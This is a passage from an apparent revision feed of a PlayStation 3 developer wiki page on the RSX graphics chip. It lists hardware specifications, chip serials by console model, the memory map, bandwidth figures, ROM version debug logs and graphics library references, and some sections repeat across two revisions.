* [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:4:7:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> RETAIL: <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; messaage, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing (or a legitimate developer) to install an unsupported firmware as the vsh allows updating to 1.00 or higher and the min praxis for those units is actually lower than 1.00.<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issue an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it into the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=41312 RSX 2016-03-18T18:38:40Z <p>Mathieulh: /* ROM Versions */ changed the layout some more</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|&lt;br /&gt;Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|&lt;br /&gt;RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|&lt;br /&gt;BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = Hardware =<br /> RSX - Reality Synthesizer<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> &lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> * [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains 